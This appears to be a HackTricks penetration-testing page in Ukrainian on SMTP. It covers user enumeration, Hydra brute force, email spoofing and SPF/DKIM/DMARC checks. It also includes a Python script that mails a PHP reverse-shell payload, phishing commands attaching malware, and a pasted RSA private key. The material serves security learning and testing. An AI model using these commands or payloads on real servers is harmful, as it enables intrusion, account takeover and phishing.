25,465,587 - Pentesting SMTP/s

Reading time: 18 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Основна інформація

Протокол простого пересилання пошти (SMTP) - це протокол, що використовується в рамках TCP/IP для відправки та отримання електронної пошти. Через свої обмеження в чергуванні повідомлень на стороні отримувача, SMTP часто використовується разом з POP3 або IMAP. Ці додаткові протоколи дозволяють користувачам зберігати повідомлення на серверному поштовому ящику та періодично їх завантажувати.

На практиці, звичайно, електронні поштові програми використовують SMTP для відправки електронних листів, в той час як POP3 або IMAP для їх отримання. На системах, що базуються на Unix, sendmail виділяється як SMTP-сервер, що найчастіше використовується для електронної пошти. Комерційний пакет, відомий як Sendmail, включає POP3-сервер. Крім того, Microsoft Exchange надає SMTP-сервер і пропонує можливість включення підтримки POP3.

Порт за замовчуванням: 25,465(ssl),587(ssl)

PORT   STATE SERVICE REASON  VERSION
25/tcp open  smtp    syn-ack Microsoft ESMTP 6.0.3790.3959

EMAIL Headers

Якщо у вас є можливість змусити жертву надіслати вам електронний лист (наприклад, через контактну форму веб-сторінки), зробіть це, тому що ви можете дізнатися про внутрішню топологію жертви, переглянувши заголовки листа.

Ви також можете отримати електронний лист від SMTP-сервера, намагаючись надіслати на цей сервер електронний лист на неіснуючу адресу (оскільки сервер надішле атакуючому лист NDN). Але переконайтеся, що ви надсилаєте електронний лист з дозволеної адреси (перевірте політику SPF) і що ви можете отримувати повідомлення NDN.

Вам також слід спробувати надіслати різний вміст, оскільки ви можете знайти більш цікаву інформацію в заголовках, наприклад: X-Virus-Scanned: by av.domain.com
Вам слід надіслати тестовий файл EICAR.
Виявлення AV може дозволити вам експлуатувати відомі вразливості.

Basic actions

SMTP:

bash
nc -vn <IP> 25

SMTPS:

bash
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587

Знаходження MX серверів організації

bash
dig +short mx google.com

Перерахування

bash
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v

NTLM Auth - Розкриття інформації

Якщо сервер підтримує NTLM auth (Windows), ви можете отримати чутливу інформацію (версії). Більше інформації тут.

bash
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

Або автоматизуйте це за допомогою плагіна nmap smtp-ntlm-info.nse

Внутрішнє ім'я сервера - Розкриття інформації

Деякі SMTP сервери автоматично заповнюють адресу відправника, коли команда "MAIL FROM" видається без повної адреси, розкриваючи своє внутрішнє ім'я:

220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK

Sniffing

Перевірте, чи можете ви перехопити пароль з пакетів на порт 25

Auth bruteforce

Username Bruteforce Enumeration

Аутентифікація не завжди потрібна

RCPT TO

bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok

VRFY

bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User root@myhost
VRFY blah
550 blah... User unknown

EXPN

bash
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep sshd@myhost

Автоматизовані інструменти

Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>

DSN Reports

Звіти про статус доставки: Якщо ви надішлете електронну пошту організації на недійсну адресу, організація повідомить, що адреса була недійсною, надіславши лист назад вам. Заголовки повернутого електронного листа міститимуть можливу чутливу інформацію (таку як IP-адреса поштових сервісів, які взаємодіяли зі звітами, або інформацію про антивірусне програмне забезпечення).

Commands

Надсилання електронної пошти з консолі linux

bash
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

<phishing message>
bash
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197

Відправка електронної пошти з Python

Код Python тут
python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys

lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587

# create message object instance
msg = MIMEMultipart()

# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"

# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))

print("[*] Payload is generated : %s" % message)

msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250:
print("[-]Connection Error")
exit()

server.starttls()

# Uncomment if log-in with authencation
# server.login(msg['From'], password)

server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()

print("[***]successfully sent email to %s:" % (msg['To']))

SMTP Smuggling

Уразливість SMTP Smuggling дозволила обійти всі захисти SMTP (перевірте наступний розділ для отримання додаткової інформації про захист). Для отримання додаткової інформації про SMTP Smuggling дивіться:

SMTP Smuggling

Заходи проти підробки електронної пошти

Організації запобігають несанкціонованій відправці електронних листів від їх імені, використовуючи SPF, DKIM та DMARC через простоту підробки SMTP повідомлень.

Повний посібник з цих заходів доступний за адресою https://seanthegeek.net/459/demystifying-dmarc/.

SPF

caution

SPF був "декларований застарілим" у 2014 році. Це означає, що замість створення TXT запису в _spf.domain.com ви створюєте його в domain.com, використовуючи ту ж синтаксис.
Більше того, для повторного використання попередніх SPF записів досить поширено знайти щось на зразок "v=spf1 include:_spf.google.com ~all"

Sender Policy Framework (SPF) — це механізм, який дозволяє Mail Transfer Agents (MTAs) перевіряти, чи має хост, що надсилає електронний лист, право на це, запитуючи список авторизованих поштових серверів, визначених організаціями. Цей список, який вказує IP-адреси/діапазони, домени та інші сутності, уповноважені надсилати електронну пошту від імені доменного імені, включає різні "Механізми" у SPF записі.

Механізми

З Wikipedia:

МеханізмОпис
ALLЗавжди збігається; використовується для стандартного результату, як -all для всіх IP, які не збігаються з попередніми механізмами.
AЯкщо доменне ім'я має адресний запис (A або AAAA), який може бути розв'язаний до адреси відправника, воно збігається.
IP4Якщо відправник знаходиться в заданому діапазоні IPv4 адрес, збігається.
IP6Якщо відправник знаходиться в заданому діапазоні IPv6 адрес, збігається.
MXЯкщо доменне ім'я має MX запис, що розв'язується до адреси відправника, воно збігається (тобто пошта надходить з одного з вхідних поштових серверів домену).
PTRЯкщо доменне ім'я (PTR запис) для адреси клієнта знаходиться в заданому домені і це доменне ім'я розв'язується до адреси клієнта (попередньо підтверджений зворотний DNS), збігається. Цей механізм не рекомендується і слід уникати, якщо це можливо.
EXISTSЯкщо задане доменне ім'я розв'язується до будь-якої адреси, збігається (незалежно від адреси, до якої воно розв'язується). Це рідко використовується. Разом з макромовою SPF пропонує більш складні збіги, такі як DNSBL-запити.
INCLUDEПосилається на політику іншого домену. Якщо політика цього домену проходить, цей механізм проходить. Однак, якщо включена політика не проходить, обробка продовжується. Щоб повністю делегувати політику іншого домену, необхідно використовувати розширення перенаправлення.
REDIRECT

Перенаправлення — це вказівник на інше доменне ім'я, яке містить політику SPF, воно дозволяє кільком доменам ділитися однією і тією ж політикою SPF. Це корисно при роботі з великою кількістю доменів, які ділять одну й ту ж інфраструктуру електронної пошти.

Політика SPF домену, вказаному в механізмі перенаправлення, буде використана.

Також можливо визначити Кваліфікатори, які вказують що слід робити, якщо механізм збігається. За замовчуванням використовується кваліфікатор "+" (тому, якщо будь-який механізм збігається, це означає, що це дозволено).
Зазвичай ви помітите в кінці кожної політики SPF щось на зразок: ~all або -all. Це використовується для вказівки, що якщо відправник не збігається з жодною політикою SPF, ви повинні позначити електронний лист як ненадійний (~) або відхилити (-) електронний лист.

Кваліфікатори

Кожен механізм у політиці може бути префіксований одним з чотирьох кваліфікаторів для визначення бажаного результату:

  • +: Відповідає результату PASS. За замовчуванням механізми припускають цей кваліфікатор, що робить +mx еквівалентним mx.
  • ?: Представляє результат NEUTRAL, обробляється аналогічно NONE (без конкретної політики).
  • ~: Означає SOFTFAIL, служить середнім варіантом між NEUTRAL і FAIL. Електронні листи, які відповідають цьому результату, зазвичай приймаються, але позначаються відповідно.
  • -: Вказує на FAIL, що означає, що електронний лист слід відхилити.

У наступному прикладі ілюструється SPF політика google.com. Зверніть увагу на включення SPF політик з різних доменів у першій політиці SPF:

shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

Традиційно було можливо підробити будь-яке ім'я домену, яке не мало правильного/жодного SPF запису. Сьогодні, якщо електронна пошта надходить з домену без дійсного SPF запису, її, ймовірно, автоматично відхилять/позначать як ненадійну.

Щоб перевірити SPF домену, ви можете використовувати онлайн-інструменти, такі як: https://www.kitterman.com/spf/validate.html

DKIM (DomainKeys Identified Mail)

DKIM використовується для підписування вихідних електронних листів, що дозволяє їх валідацію зовнішніми агентами передачі пошти (MTA) через отримання публічного ключа домену з DNS. Цей публічний ключ знаходиться в TXT записі домену. Щоб отримати цей ключ, потрібно знати як селектор, так і ім'я домену.

Наприклад, щоб запитати ключ, необхідні ім'я домену та селектор. Їх можна знайти в заголовку пошти DKIM-Signature, наприклад, d=gmail.com;s=20120113.

Команда для отримання цієї інформації може виглядати так:

bash
dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC (Domain-based Message Authentication, Reporting & Conformance)

DMARC покращує безпеку електронної пошти, спираючись на протоколи SPF та DKIM. Він визначає політики, які керують поштовими серверами у обробці електронних листів з конкретного домену, включаючи способи вирішення проблем з автентифікацією та куди надсилати звіти про дії з обробки електронної пошти.

Щоб отримати запис DMARC, вам потрібно запитати піддомен _dmarc

bash
# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

DMARC теги

Назва тегаПризначенняПриклад
vВерсія протоколуv=DMARC1
pctВідсоток повідомлень, що підлягають фільтраціїpct=20
rufURI для звітів про форензичні звітиruf=mailto:authfail@example.com
ruaURI для звітів про агреговані даніrua=mailto:aggrep@example.com
pПолітика для організаційного доменуp=quarantine
spПолітика для піддоменів ОДsp=reject
adkimРежим вирівнювання для DKIMadkim=s
aspfРежим вирівнювання для SPFaspf=r

Що з піддоменами?

З тут.
Вам потрібно мати окремі SPF записи для кожного піддомену, з якого ви хочете надсилати електронну пошту.
Наступне спочатку було опубліковано на openspf.org, який раніше був чудовим ресурсом для цього.

Питання Демона: Що з піддоменами?

Якщо я отримую електронну пошту з pielovers.demon.co.uk, і для pielovers немає SPF даних, чи повинен я повернутися на один рівень і перевірити SPF для demon.co.uk? Ні. Кожен піддомен у Demon є різним клієнтом, і кожен клієнт може мати свою власну політику. Не мало б сенсу, щоб політика Demon's застосовувалася до всіх його клієнтів за замовчуванням; якщо Demon хоче це зробити, він може налаштувати SPF записи для кожного піддомену.

Тож порада для видавців SPF така: ви повинні додати SPF запис для кожного піддомену або імені хоста, яке має A або MX запис.

Сайти з дикими A або MX записами також повинні мати дикий SPF запис у формі: * IN TXT "v=spf1 -all"

Це має сенс - піддомен може бути в іншому географічному місці і мати дуже інше визначення SPF.

Відкритий релей

Коли надсилаються електронні листи, важливо забезпечити, щоб вони не були позначені як спам. Це часто досягається за допомогою релейного сервера, якому довіряє отримувач. Однак поширеною проблемою є те, що адміністратори можуть не повністю усвідомлювати, які IP-діапазони безпечні для дозволу. Ця відсутність розуміння може призвести до помилок у налаштуванні SMTP сервера, що є ризиком, який часто виявляється під час оцінки безпеки.

Обхідний шлях, який деякі адміністратори використовують, щоб уникнути проблем з доставкою електронної пошти, особливо щодо спілкування з потенційними або поточними клієнтами, полягає в тому, щоб дозволити з'єднання з будь-якої IP-адреси. Це робиться шляхом налаштування параметра mynetworks SMTP сервера для прийняття всіх IP-адрес, як показано нижче:

bash
mynetworks = 0.0.0.0/0

Для перевірки, чи є поштовий сервер відкритим релеєм (що означає, що він може пересилати електронну пошту з будь-якого зовнішнього джерела), зазвичай використовується інструмент nmap. Він включає специфічний скрипт, призначений для тестування цього. Команда для проведення детального сканування сервера (наприклад, з IP 10.10.10.10) на порту 25 за допомогою nmap виглядає так:

bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v

Інструменти

Відправка підробленого електронного листа

Або ви можете використовувати інструмент:

bash
# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

warning

Якщо ви отримали будь-яку помилку при використанні бібліотеки dkim python для парсингу ключа, не соромтеся використовувати наступний.
ПРИМІТКА: Це просто брудне рішення для швидких перевірок у випадках, коли з якоїсь причини приватний ключ openssl не може бути розпарсений dkim.

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

Або ви можете зробити це вручну:

# Це надішле непідписане повідомлення
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");

Більше інформації

Знайдіть більше інформації про ці захисти в https://seanthegeek.net/459/demystifying-dmarc/

Інші індикатори фішингу

  • Вік домену
  • Посилання, що вказують на IP-адреси
  • Техніки маніпуляції посиланнями
  • Підозрілі (незвичайні) вкладення
  • Пошкоджений вміст електронної пошти
  • Значення, що відрізняються від заголовків листа
  • Наявність дійсного та надійного SSL-сертифіката
  • Подання сторінки на сайти фільтрації веб-контенту

Екстракція через SMTP

Якщо ви можете надсилати дані через SMTP прочитайте це.

Конфігураційний файл

Postfix

Зазвичай, якщо встановлено, в /etc/postfix/master.cf містяться скрипти для виконання коли, наприклад, нова пошта отримується користувачем. Наприклад, рядок flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} означає, що /etc/postfix/filtering буде виконано, якщо нова пошта отримана користувачем mark.

Інші конфігураційні файли:

sendmail.cf
submit.cf

Посилання

HackTricks Автоматичні Команди

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks